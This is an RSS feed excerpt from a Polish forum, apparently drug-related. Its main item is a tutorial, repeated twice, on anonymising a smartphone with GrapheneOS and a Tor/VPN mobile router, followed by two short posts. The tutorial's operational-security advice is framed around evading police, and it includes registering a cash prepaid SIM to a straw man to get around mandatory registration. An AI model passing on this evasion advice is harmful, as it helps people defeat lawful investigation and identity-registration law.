<span style="font-style: italic;" class="mycode_i">• Sandboxed Google Play: To "game changer". Jeśli potrzebujesz jakiejś apki Google (np. Mapy), możesz je zainstalować jako zwykłe aplikacje. Działają one w izolacji (piaskownicy) i nie mają dostępu do reszty telefonu.</span><br />
<span style="font-style: italic;" class="mycode_i">• Bezpieczeństwo: Utwardzony kernel, lepsze zarządzanie pamięcią, szybkie łatki bezpieczeństwa (często szybciej niż na stockowym Androidzie!).</span><br />
<span style="font-style: italic;" class="mycode_i">• Przeglądarka Vanadium: Specjalnie wzmocniona wersja Chromium, domyślna w systemie.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">📱 Na czym to działa?</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">Paradoksalnie GrapheneOS działa oficjalnie tylko na telefonach Google Pixel. Dlaczego? Bo mają najlepszy chip bezpieczeństwa (Titan M2) i pozwalają na ponowne zablokowanie bootloadera przy niestandardowym kluczu (Verified Boot). Dzięki temu nikt nie wgra Wam złośliwego softu bez Waszej wiedzy.</span><br />
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b">Lista wspieranych urządzeń:</span></div>
<div style="text-align: center;" class="mycode_align"><span style="font-style: italic;" class="mycode_i">• Pixel 10 Pro Fold / 10 Pro XL / 10 Pro / 10</span></div>
<div style="text-align: center;" class="mycode_align"><span style="font-style: italic;" class="mycode_i">• Pixel 9a / 9 Pro Fold / 9 Pro XL / 9 Pro / 9</span></div>
<div style="text-align: center;" class="mycode_align"><span style="font-style: italic;" class="mycode_i">• Pixel 8a / 8 Pro / 8 / Fold / Tablet</span></div>
<div style="text-align: center;" class="mycode_align"><span style="font-style: italic;" class="mycode_i">• Pixel 7a / 7 Pro / 7</span></div>
<div style="text-align: center;" class="mycode_align"><span style="font-style: italic;" class="mycode_i">• Pixel 6a / 6 Pro / 6</span></div>
<div style="text-align: center;" class="mycode_align"><span style="font-style: italic;" class="mycode_i">• (Pełna lista: grapheneos.org/faq#device-support)</span></div>
<br />
<span style="font-weight: bold;" class="mycode_b">📶 Wybór routera – Nasze centrum łączności</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">Jeśli telefon ma być w pełni bezpieczny, musimy ogarnąć drugie urządzenie (router). Osobiście uważam, że GrapheneOS na co dzień jako jedyny telefon może doprowadzić do szewskiej pasji, ale do bezpiecznych operacji jest zajebisty.</span><br />
<span style="font-style: italic;" class="mycode_i">Samą instalację systemu pominę, bo łatwo ją znaleźć w sieci: Instrukcja instalacji. Skupmy się na routerze.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">Opcja „Budget”:</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i">Jeśli milicja nie ma na Ciebie takiego parcia, jak przeciętny użytkownik tego forum na metaklefedron (XD), możesz kupić najzwyklejszy mobilny router Alcatela albo inne gówno z Temu i puszczać ruch przez aplikację Orbot na telefonie.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">Opcja „PRO / BOSS”:</span></span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">1. GL.iNet GL-X3000 (Spitz AX) – Bestia wydajności (5G)</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">To jest "starszy brat" modelu Mudi. Jeśli masz budżet i zależy Ci na prędkości, to jest topowy wybór.</span><br />
<span style="font-style: italic;" class="mycode_i">• Zalety: Obsługuje 5G oraz Wi-Fi 6. Ma bardzo mocny procesor, dzięki czemu obsługa protokołu WireGuard osiąga prędkości nawet do 150-200 Mbps (dla porównania, zwykłe routery dławią się przy 20 Mbps).</span><br />
<span style="font-style: italic;" class="mycode_i">• VPN: Natywna obsługa OpenVPN i WireGuard. Fizyczny przełącznik z boku obudowy do włączania VPN.</span><br />
<span style="font-style: italic;" class="mycode_i">• Wada: Nie ma wbudowanej baterii (musi być podłączony do prądu lub powerbanka przez USB-C). Jest też dość duży i drogi (ok. 2000+ zł).</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">2. Teltonika RUT241 / RUT950 – Pancerne rozwiązanie przemysłowe</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">Jeśli bardziej niż na prędkości zależy Ci na tym, żeby sprzęt działał w każdych warunkach (np. wrzucasz go do plecaka, auta, czy domku letniskowego i zapominasz), celuj w litewską markę Teltonika.</span><br />
<span style="font-style: italic;" class="mycode_i">• Zalety: Sprzęt klasy przemysłowej. Metalowa obudowa, niesamowita stabilność (system RutOS bazujący na OpenWRT). Bardzo rozbudowane opcje konfiguracji VPN (OpenVPN, IPsec, WireGuard, ZeroTier).</span><br />
<span style="font-style: italic;" class="mycode_i">• Wady: Interfejs jest trudniejszy (mniej "user friendly" niż w GL.iNet). Procesory są nastawione na niezawodność, a nie wydajność – przy włączonym VPN prędkość spadnie zauważalnie (często poniżej 20-30 Mbps). Brak wbudowanej baterii.</span><br />
<span style="font-style: italic;" class="mycode_i">• Cena: Ok. 700-900 zł.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">3. Cudy LT500 / LT18 – Budżetowa alternatywa</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">Coraz popularniejsza marka, która w przeciwieństwie do TP-Linka, wpycha obsługę VPN do domowych routerów LTE.</span><br />
<span style="font-style: italic;" class="mycode_i">• Zalety: Cena. Model LT500 kupisz za ok. 300-400 zł. Obsługuje klientów PPTP / L2TP / OpenVPN / WireGuard. To najtańszy sposób na router LTE z VPN "prosto z pudełka".</span><br />
<span style="font-style: italic;" class="mycode_i">• Wady: Jakość wykonania jest "plastikowa". Oprogramowanie jest proste, ale nie daje takiej kontroli jak OpenWRT w GL.iNet czy Teltonice. Prędkości VPN będą przeciętne.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">💡 Dlaczego protokół ma znaczenie? (Ważna uwaga techniczna)</span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="text-decoration: underline;" class="mycode_u">Kupując router do tego zestawu, musisz używać protokołu WireGuard, a nie OpenVPN.</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i">• OpenVPN: Jest stary i "ciężki". Mobilne routery mają słabe procesory. Na OpenVPN wyciągniesz max 10-15 Mbps prędkości.</span><br />
<span style="font-style: italic;" class="mycode_i">• WireGuard: Jest nowoczesny i lekki. Na tym samym routerze wyciągniesz 50-80 Mbps (lub więcej na modelu Spitz AX).</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">Oczywiście możemy szukac alternatyw dla tych propozycji. Bo sa duzo tańsze modele, lub i takie ktore nie maja funkcji przepuszczenia ruchu siecii przez VPN-a domyślnie ale da sie zmienić ich oprogramowanie. <img src="https://dopal.org/images/smilies/wink.png" alt="Wink" title="Wink" class="smilie smilie_2" /></span> <br />
<br />
<span style="font-weight: bold;" class="mycode_b">🏆 Mój wybór: GL.iNet GL-E750 (Mudi) v2</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">To jest przenośny router 4G/LTE z wbudowaną baterią (7000 mAh), który został stworzony z myślą o prywatności.</span><br />
<span style="font-style: italic;" class="mycode_i">Dlaczego to idealny partner dla GrapheneOS?</span><br />
<span style="font-style: italic;" class="mycode_i">• Natywna obsługa Tor: W panelu administratora masz po prostu suwak/przycisk do włączenia Tora. Nie musisz nic hackować ani wpisywać komend w terminalu. Cały ruch z urządzeń podłączonych do Wi-Fi idzie przez sieć cebulową.</span><br />
<span style="font-style: italic;" class="mycode_i">• OpenSource: Działa na zmodyfikowanym OpenWRT. To oznacza, że nie ma tam (teoretycznie) tylnych furtek, jakie mogą mieć routery Huawei czy ZTE.</span><br />
<span style="font-style: italic;" class="mycode_i">• Fizyczny przełącznik (Kill Switch): Z boku obudowy masz przełącznik, który możesz zaprogramować. Np. pstryknięcie włącza Tora lub VPN.</span><br />
<span style="font-style: italic;" class="mycode_i">• Anonimizacja sprzętowa: Twój operator sieci (Orange, Play, T-Mobile itp.) widzi IMEI routera, a nie Twojego Pixela. GrapheneOS domyślnie losuje adres MAC przy łączeniu z Wi-Fi, więc jesteś bardzo trudny do śledzenia (router robi za tarczę).</span><br />
<span style="font-style: italic;" class="mycode_i">• DNS over TLS (Cloudflare/NextDNS): Możesz zaszyfrować zapytania DNS bezpośrednio na routerze.</span><br />
<span style="font-style: italic;" class="mycode_i">Alternatywa (nieco tańsza/inna budowa):</span><br />
<span style="font-style: italic;" class="mycode_i">• GL.iNet GL-XE300 (Puli): Też ma baterię i LTE, ale wygląda bardziej jak klasyczny router przemysłowy (ma anteny na zewnątrz). Działa na tej samej zasadzie.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">⚠️ O czym musisz pamiętać (Ważne!):</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">• Zasada "Nie krzyżuj strumieni": Jeśli włączysz Tor na routerze, NIE włączaj już Orbot/Tor Browser na telefonie z GrapheneOS. </span><br />
<span style="font-style: italic;" class="mycode_i">• Tor over Tor (tunelowanie Tora w Torze) nie zwiększa bezpieczeństwa, a drastycznie niszczy prędkość i często uniemożliwia połączenie (węzły wyjściowe mogą odrzucać takie pakiety).</span><br />
<span style="font-style: italic;" class="mycode_i">• Prędkość: Cały ruch przez Tor będzie wolny. Streaming w 4K czy pobieranie dużych plików będzie bolesne. To rozwiązanie do komunikacji tekstowej, maili i lekkiego przeglądania.</span><br />
<span style="font-style: italic;" class="mycode_i">• Captchas: Przygotuj się na to, że 90% stron będzie kazało Ci klikać w pasy dla pieszych i hydranty. Ruch z węzłów wyjściowych Tora jest często flagowany jako "podejrzany".</span><br />
<span style="font-style: italic;" class="mycode_i">• Karta SIM: Najlepiej użyj pre-paida kupionego za gotówkę i zarejestrowanego (w Polsce niestety obowiązek) na "słupa" lub w punkcie, który nie weryfikuje zbyt wnikliwie, aby zachować pełną anonimowość.</span><br />
<span style="font-style: italic;" class="mycode_i">• </span><br />
<span style="font-style: italic;" class="mycode_i">Podsumowując: Kup GL.iNet Mudi (GL-E750). To drogi sprzęt (ok. 800-1000 zł), ale do Twoich zastosowań nie ma lepszej, gotowej alternatywy.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">⚠️ Kluczowe zasady BHP (Jak nie dać się dojechać)</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">Sam sprzęt to nie wszystko. Musisz wiedzieć, jak się z nim obchodzić:</span><br />
<span style="font-style: italic;" class="mycode_i">• Izolacja przy starcie: Gdy dostaniesz Pixela i router, nie włączaj ich w domu. Nie łącz się z domowym Wi-Fi. Twój prywatny telefon ma być wyłączony (dla pewności owiń go folią aluminiową).</span><br />
<span style="font-style: italic;" class="mycode_i">• Pierwsza konfiguracja: GrapheneOS i router konfiguruj „na mieście” lub na osobnej karcie SIM. Po wszystkim wyłącz sprzęt, wyjmij kartę SIM, owiń wszystko folią i dopiero wtedy odpal prywatny telefon.</span><br />
<span style="font-style: italic;" class="mycode_i">• Zasada dwóch urządzeń: Nigdy, przenigdy nie miej włączonego routera i telefonu z GrapheneOS obok swojego prywatnego smartfona z Twoją prawdziwą kartą SIM! </span><br />
<span style="font-style: italic;" class="mycode_i">• DLACZEGO? Jeśli oba urządzenia zalogują się do tego samego BTS-a w tym samym czasie, jesteś do namierzenia w minutę. Milicja powiąże Twój prywatny numer z Twoim „anonimowym” setupem.</span><br />
<span style="font-style: italic;" class="mycode_i">• Higiena danych: </span><br />
<span style="font-style: italic;" class="mycode_i">• Nigdy nie loguj się na prywatne socjale (FB, IG, itp.).</span><br />
<span style="font-style: italic;" class="mycode_i">• Nie korzystaj z bankowości na swoje prawdziwe dane.</span><br />
<span style="font-style: italic;" class="mycode_i">• Zmieniaj karty SIM w routerze jak najczęściej (kupuj pre-paidy za gotówkę).</span><br />
<span style="font-style: italic;" class="mycode_i">• Nigdy nie podawaj nikomu numeru karty, która siedzi w routerze.</span><br />
<span style="font-style: italic;" class="mycode_i">• Nigdy nie zabieraj obu telefonów (prywatnego i bezpiecznego) w to samo miejsce w tym samym czasie.</span><br />
<span style="font-style: italic;" class="mycode_i">Ten config nie sprawi, że magicznie staniesz się nieuchwytny dla służb specjalnych, ale pomoże Ci stać się niewidzialnym w terenie dla standardowej analityki i "smutnych panów".</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Czy warto? niech sobie kazdy odpowie sam. </span><br />
<span style="font-weight: bold;" class="mycode_b">Jest to oczywiscie tylko propozycja oraz przedstawienie metody na anonimizacje smartfona.</span><br />
<span style="font-weight: bold;" class="mycode_b">Zachecam do dyskusji w komentarzach <img src="https://dopal.org/images/smilies/wink.png" alt="Wink" title="Wink" class="smilie smilie_2" /></span>]]></description>
			<content:encoded><![CDATA[<span style="font-weight: bold;" class="mycode_b">Witam! W tym tutorialu przyjrzymy się najbardziej bezpiecznej opcji, jeśli chodzi o smartfon – przynajmniej według mnie.</span><br />
<span style="font-weight: bold;" class="mycode_b">Na wstępie zaznaczę: bez wydania konkretnej kupy Gelda czy też PLN-ów się nie obejdzie. Nasz setup będzie pozbawiony funkcji dzwonienia na numer telefonu, ponieważ w samym smartfonie nigdy nie wyląduje karta SIM.</span><br />
<span style="font-weight: bold;" class="mycode_b">Połowa osób pewnie właśnie opluła ekrany, łapiąc się za głowę i pytając w myślach:</span><br />
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-style: italic;" class="mycode_i">"Co Ty, Hoxed, pierdolisz? Mam zapierdalać po mieście i szukać darmowych hotspotów, żeby odpisać na wiadomość?"</span></div>
<span style="font-weight: bold;" class="mycode_b">💡 Na czym polega plan?</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">Cały misterny plan opiera się na tym, aby używać internetu z mobilnego routera na karty SIM (i to nie byle jakiego). W smartfonie z zainstalowanym systemem GrapheneOS nigdy nie używamy karty SIM, wyłączamy całkowicie usługi GPS i trzymamy się twardych zasad BHP pracy z takim urządzeniem.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">📱 Czym w ogóle jest GrapheneOS?</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">W największym skrócie: to system operacyjny bazujący na AOSP (Android Open Source Project). Jest to najbezpieczniejszy i najbardziej prywatny system mobilny dostępny dla zwykłego użytkownika.</span><br />
<span style="font-style: italic;" class="mycode_i">To nie jest "kolejny Custom ROM" do zabawy. To profesjonalny projekt stawiający na security hardening (utwardzanie bezpieczeństwa) i privacy by design. Nawet Edward Snowden przyznał, że sam z niego korzysta.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">🛡️ Najważniejsze funkcje (Killer Features):</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">• Całkowity brak Google (De-Googled): System domyślnie nie ma żadnych usług Google. Twój telefon nie wysyła w tle danych o Twojej lokalizacji czy aktywności na serwery korporacji.</span><br />
<span style="font-style: italic;" class="mycode_i">• Sandboxed Google Play: To "game changer". Jeśli potrzebujesz jakiejś apki Google (np. Mapy), możesz je zainstalować jako zwykłe aplikacje. Działają one w izolacji (piaskownicy) i nie mają dostępu do reszty telefonu.</span><br />
<span style="font-style: italic;" class="mycode_i">• Bezpieczeństwo: Utwardzony kernel, lepsze zarządzanie pamięcią, szybkie łatki bezpieczeństwa (często szybciej niż na stockowym Androidzie!).</span><br />
<span style="font-style: italic;" class="mycode_i">• Przeglądarka Vanadium: Specjalnie wzmocniona wersja Chromium, domyślna w systemie.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">📱 Na czym to działa?</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">Paradoksalnie GrapheneOS działa oficjalnie tylko na telefonach Google Pixel. Dlaczego? Bo mają najlepszy chip bezpieczeństwa (Titan M2) i pozwalają na ponowne zablokowanie bootloadera przy niestandardowym kluczu (Verified Boot). Dzięki temu nikt nie wgra Wam złośliwego softu bez Waszej wiedzy.</span><br />
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b">Lista wspieranych urządzeń:</span></div>
<div style="text-align: center;" class="mycode_align"><span style="font-style: italic;" class="mycode_i">• Pixel 10 Pro Fold / 10 Pro XL / 10 Pro / 10</span></div>
<div style="text-align: center;" class="mycode_align"><span style="font-style: italic;" class="mycode_i">• Pixel 9a / 9 Pro Fold / 9 Pro XL / 9 Pro / 9</span></div>
<div style="text-align: center;" class="mycode_align"><span style="font-style: italic;" class="mycode_i">• Pixel 8a / 8 Pro / 8 / Fold / Tablet</span></div>
<div style="text-align: center;" class="mycode_align"><span style="font-style: italic;" class="mycode_i">• Pixel 7a / 7 Pro / 7</span></div>
<div style="text-align: center;" class="mycode_align"><span style="font-style: italic;" class="mycode_i">• Pixel 6a / 6 Pro / 6</span></div>
<div style="text-align: center;" class="mycode_align"><span style="font-style: italic;" class="mycode_i">• (Pełna lista: grapheneos.org/faq#device-support)</span></div>
<br />
<span style="font-weight: bold;" class="mycode_b">📶 Wybór routera – Nasze centrum łączności</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">Jeśli telefon ma być w pełni bezpieczny, musimy ogarnąć drugie urządzenie (router). Osobiście uważam, że GrapheneOS na co dzień jako jedyny telefon może doprowadzić do szewskiej pasji, ale do bezpiecznych operacji jest zajebisty.</span><br />
<span style="font-style: italic;" class="mycode_i">Samą instalację systemu pominę, bo łatwo ją znaleźć w sieci: Instrukcja instalacji. Skupmy się na routerze.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">Opcja „Budget”:</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i">Jeśli milicja nie ma na Ciebie takiego parcia, jak przeciętny użytkownik tego forum na metaklefedron (XD), możesz kupić najzwyklejszy mobilny router Alcatela albo inne gówno z Temu i puszczać ruch przez aplikację Orbot na telefonie.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">Opcja „PRO / BOSS”:</span></span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">1. GL.iNet GL-X3000 (Spitz AX) – Bestia wydajności (5G)</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">To jest "starszy brat" modelu Mudi. Jeśli masz budżet i zależy Ci na prędkości, to jest topowy wybór.</span><br />
<span style="font-style: italic;" class="mycode_i">• Zalety: Obsługuje 5G oraz Wi-Fi 6. Ma bardzo mocny procesor, dzięki czemu obsługa protokołu WireGuard osiąga prędkości nawet do 150-200 Mbps (dla porównania, zwykłe routery dławią się przy 20 Mbps).</span><br />
<span style="font-style: italic;" class="mycode_i">• VPN: Natywna obsługa OpenVPN i WireGuard. Fizyczny przełącznik z boku obudowy do włączania VPN.</span><br />
<span style="font-style: italic;" class="mycode_i">• Wada: Nie ma wbudowanej baterii (musi być podłączony do prądu lub powerbanka przez USB-C). Jest też dość duży i drogi (ok. 2000+ zł).</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">2. Teltonika RUT241 / RUT950 – Pancerne rozwiązanie przemysłowe</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">Jeśli bardziej niż na prędkości zależy Ci na tym, żeby sprzęt działał w każdych warunkach (np. wrzucasz go do plecaka, auta, czy domku letniskowego i zapominasz), celuj w litewską markę Teltonika.</span><br />
<span style="font-style: italic;" class="mycode_i">• Zalety: Sprzęt klasy przemysłowej. Metalowa obudowa, niesamowita stabilność (system RutOS bazujący na OpenWRT). Bardzo rozbudowane opcje konfiguracji VPN (OpenVPN, IPsec, WireGuard, ZeroTier).</span><br />
<span style="font-style: italic;" class="mycode_i">• Wady: Interfejs jest trudniejszy (mniej "user friendly" niż w GL.iNet). Procesory są nastawione na niezawodność, a nie wydajność – przy włączonym VPN prędkość spadnie zauważalnie (często poniżej 20-30 Mbps). Brak wbudowanej baterii.</span><br />
<span style="font-style: italic;" class="mycode_i">• Cena: Ok. 700-900 zł.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">3. Cudy LT500 / LT18 – Budżetowa alternatywa</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">Coraz popularniejsza marka, która w przeciwieństwie do TP-Linka, wpycha obsługę VPN do domowych routerów LTE.</span><br />
<span style="font-style: italic;" class="mycode_i">• Zalety: Cena. Model LT500 kupisz za ok. 300-400 zł. Obsługuje klientów PPTP / L2TP / OpenVPN / WireGuard. To najtańszy sposób na router LTE z VPN "prosto z pudełka".</span><br />
<span style="font-style: italic;" class="mycode_i">• Wady: Jakość wykonania jest "plastikowa". Oprogramowanie jest proste, ale nie daje takiej kontroli jak OpenWRT w GL.iNet czy Teltonice. Prędkości VPN będą przeciętne.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">💡 Dlaczego protokół ma znaczenie? (Ważna uwaga techniczna)</span><br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="text-decoration: underline;" class="mycode_u">Kupując router do tego zestawu, musisz używać protokołu WireGuard, a nie OpenVPN.</span></span><br />
<br />
<span style="font-style: italic;" class="mycode_i">• OpenVPN: Jest stary i "ciężki". Mobilne routery mają słabe procesory. Na OpenVPN wyciągniesz max 10-15 Mbps prędkości.</span><br />
<span style="font-style: italic;" class="mycode_i">• WireGuard: Jest nowoczesny i lekki. Na tym samym routerze wyciągniesz 50-80 Mbps (lub więcej na modelu Spitz AX).</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">Oczywiście możemy szukac alternatyw dla tych propozycji. Bo sa duzo tańsze modele, lub i takie ktore nie maja funkcji przepuszczenia ruchu siecii przez VPN-a domyślnie ale da sie zmienić ich oprogramowanie. <img src="https://dopal.org/images/smilies/wink.png" alt="Wink" title="Wink" class="smilie smilie_2" /></span> <br />
<br />
<span style="font-weight: bold;" class="mycode_b">🏆 Mój wybór: GL.iNet GL-E750 (Mudi) v2</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">To jest przenośny router 4G/LTE z wbudowaną baterią (7000 mAh), który został stworzony z myślą o prywatności.</span><br />
<span style="font-style: italic;" class="mycode_i">Dlaczego to idealny partner dla GrapheneOS?</span><br />
<span style="font-style: italic;" class="mycode_i">• Natywna obsługa Tor: W panelu administratora masz po prostu suwak/przycisk do włączenia Tora. Nie musisz nic hackować ani wpisywać komend w terminalu. Cały ruch z urządzeń podłączonych do Wi-Fi idzie przez sieć cebulową.</span><br />
<span style="font-style: italic;" class="mycode_i">• OpenSource: Działa na zmodyfikowanym OpenWRT. To oznacza, że nie ma tam (teoretycznie) tylnych furtek, jakie mogą mieć routery Huawei czy ZTE.</span><br />
<span style="font-style: italic;" class="mycode_i">• Fizyczny przełącznik (Kill Switch): Z boku obudowy masz przełącznik, który możesz zaprogramować. Np. pstryknięcie włącza Tora lub VPN.</span><br />
<span style="font-style: italic;" class="mycode_i">• Anonimizacja sprzętowa: Twój operator sieci (Orange, Play, T-Mobile itp.) widzi IMEI routera, a nie Twojego Pixela. GrapheneOS domyślnie losuje adres MAC przy łączeniu z Wi-Fi, więc jesteś bardzo trudny do śledzenia (router robi za tarczę).</span><br />
<span style="font-style: italic;" class="mycode_i">• DNS over TLS (Cloudflare/NextDNS): Możesz zaszyfrować zapytania DNS bezpośrednio na routerze.</span><br />
<span style="font-style: italic;" class="mycode_i">Alternatywa (nieco tańsza/inna budowa):</span><br />
<span style="font-style: italic;" class="mycode_i">• GL.iNet GL-XE300 (Puli): Też ma baterię i LTE, ale wygląda bardziej jak klasyczny router przemysłowy (ma anteny na zewnątrz). Działa na tej samej zasadzie.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">⚠️ O czym musisz pamiętać (Ważne!):</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">• Zasada "Nie krzyżuj strumieni": Jeśli włączysz Tor na routerze, NIE włączaj już Orbot/Tor Browser na telefonie z GrapheneOS. </span><br />
<span style="font-style: italic;" class="mycode_i">• Tor over Tor (tunelowanie Tora w Torze) nie zwiększa bezpieczeństwa, a drastycznie niszczy prędkość i często uniemożliwia połączenie (węzły wyjściowe mogą odrzucać takie pakiety).</span><br />
<span style="font-style: italic;" class="mycode_i">• Prędkość: Cały ruch przez Tor będzie wolny. Streaming w 4K czy pobieranie dużych plików będzie bolesne. To rozwiązanie do komunikacji tekstowej, maili i lekkiego przeglądania.</span><br />
<span style="font-style: italic;" class="mycode_i">• Captchas: Przygotuj się na to, że 90% stron będzie kazało Ci klikać w pasy dla pieszych i hydranty. Ruch z węzłów wyjściowych Tora jest często flagowany jako "podejrzany".</span><br />
<span style="font-style: italic;" class="mycode_i">• Karta SIM: Najlepiej użyj pre-paida kupionego za gotówkę i zarejestrowanego (w Polsce niestety obowiązek) na "słupa" lub w punkcie, który nie weryfikuje zbyt wnikliwie, aby zachować pełną anonimowość.</span><br />
<span style="font-style: italic;" class="mycode_i">• </span><br />
<span style="font-style: italic;" class="mycode_i">Podsumowując: Kup GL.iNet Mudi (GL-E750). To drogi sprzęt (ok. 800-1000 zł), ale do Twoich zastosowań nie ma lepszej, gotowej alternatywy.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">⚠️ Kluczowe zasady BHP (Jak nie dać się dojechać)</span><br />
<br />
<span style="font-style: italic;" class="mycode_i">Sam sprzęt to nie wszystko. Musisz wiedzieć, jak się z nim obchodzić:</span><br />
<span style="font-style: italic;" class="mycode_i">• Izolacja przy starcie: Gdy dostaniesz Pixela i router, nie włączaj ich w domu. Nie łącz się z domowym Wi-Fi. Twój prywatny telefon ma być wyłączony (dla pewności owiń go folią aluminiową).</span><br />
<span style="font-style: italic;" class="mycode_i">• Pierwsza konfiguracja: GrapheneOS i router konfiguruj „na mieście” lub na osobnej karcie SIM. Po wszystkim wyłącz sprzęt, wyjmij kartę SIM, owiń wszystko folią i dopiero wtedy odpal prywatny telefon.</span><br />
<span style="font-style: italic;" class="mycode_i">• Zasada dwóch urządzeń: Nigdy, przenigdy nie miej włączonego routera i telefonu z GrapheneOS obok swojego prywatnego smartfona z Twoją prawdziwą kartą SIM! </span><br />
<span style="font-style: italic;" class="mycode_i">• DLACZEGO? Jeśli oba urządzenia zalogują się do tego samego BTS-a w tym samym czasie, jesteś do namierzenia w minutę. Milicja powiąże Twój prywatny numer z Twoim „anonimowym” setupem.</span><br />
<span style="font-style: italic;" class="mycode_i">• Higiena danych: </span><br />
<span style="font-style: italic;" class="mycode_i">• Nigdy nie loguj się na prywatne socjale (FB, IG, itp.).</span><br />
<span style="font-style: italic;" class="mycode_i">• Nie korzystaj z bankowości na swoje prawdziwe dane.</span><br />
<span style="font-style: italic;" class="mycode_i">• Zmieniaj karty SIM w routerze jak najczęściej (kupuj pre-paidy za gotówkę).</span><br />
<span style="font-style: italic;" class="mycode_i">• Nigdy nie podawaj nikomu numeru karty, która siedzi w routerze.</span><br />
<span style="font-style: italic;" class="mycode_i">• Nigdy nie zabieraj obu telefonów (prywatnego i bezpiecznego) w to samo miejsce w tym samym czasie.</span><br />
<span style="font-style: italic;" class="mycode_i">Ten config nie sprawi, że magicznie staniesz się nieuchwytny dla służb specjalnych, ale pomoże Ci stać się niewidzialnym w terenie dla standardowej analityki i "smutnych panów".</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Czy warto? niech sobie kazdy odpowie sam. </span><br />
<span style="font-weight: bold;" class="mycode_b">Jest to oczywiscie tylko propozycja oraz przedstawienie metody na anonimizacje smartfona.</span><br />
<span style="font-weight: bold;" class="mycode_b">Zachecam do dyskusji w komentarzach <img src="https://dopal.org/images/smilies/wink.png" alt="Wink" title="Wink" class="smilie smilie_2" /></span>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Klawiatura na telefon]]></title>
			<link>https://dopal.org/showthread.php?tid=5935</link>
			<pubDate>Mon, 11 Aug 2025 13:23:37 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://dopal.org/member.php?action=profile&uid=156">bonzajmatejko</a>]]></dc:creator>
			<guid isPermaLink="false">https://dopal.org/showthread.php?tid=5935</guid>
			<description><![CDATA[Poleci ktoś bezpieczną klawiaturę na urządzenie mobilne, która nie zapisuje tego, co się na niej pisze?<br />
Pozdro]]></description>
			<content:encoded><![CDATA[Poleci ktoś bezpieczną klawiaturę na urządzenie mobilne, która nie zapisuje tego, co się na niej pisze?<br />
Pozdro]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Ukrywanie zdjęć]]></title>
			<link>https://dopal.org/showthread.php?tid=5917</link>
			<pubDate>Thu, 07 Aug 2025 07:13:05 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://dopal.org/member.php?action=profile&uid=3641">Metykatykot</a>]]></dc:creator>
			<guid isPermaLink="false">https://dopal.org/showthread.php?tid=5917</guid>
			<description><![CDATA[Ciekawostka. Mozna skitrać pościągane pornosy przed kobietą, zdjęcia kochanek czy ważne zdjęcia niebezpiecznych dopalaczy<img src="https://dopal.org/images/smilies/drug2.png" alt="Podobno kultowa" title="Podobno kultowa" class="smilie smilie_28" /><br />
<a href="https://ibb.co/CKxS7n1Q" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/gZscTDjJ/IMG-20250807-090911.png" loading="lazy"  alt="[Obrazek: IMG-20250807-090911.png]" class="mycode_img" /></a><br />
<br />
Video jak to działa:<iframe frameborder="0" width="480" height="270" src="//www.dailymotion.com/embed/video/x9ob7lu" allowfullscreen="true"></iframe>]]></description>
			<content:encoded><![CDATA[Ciekawostka. Mozna skitrać pościągane pornosy przed kobietą, zdjęcia kochanek czy ważne zdjęcia niebezpiecznych dopalaczy<img src="https://dopal.org/images/smilies/drug2.png" alt="Podobno kultowa" title="Podobno kultowa" class="smilie smilie_28" /><br />
<a href="https://ibb.co/CKxS7n1Q" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/gZscTDjJ/IMG-20250807-090911.png" loading="lazy"  alt="[Obrazek: IMG-20250807-090911.png]" class="mycode_img" /></a><br />
<br />
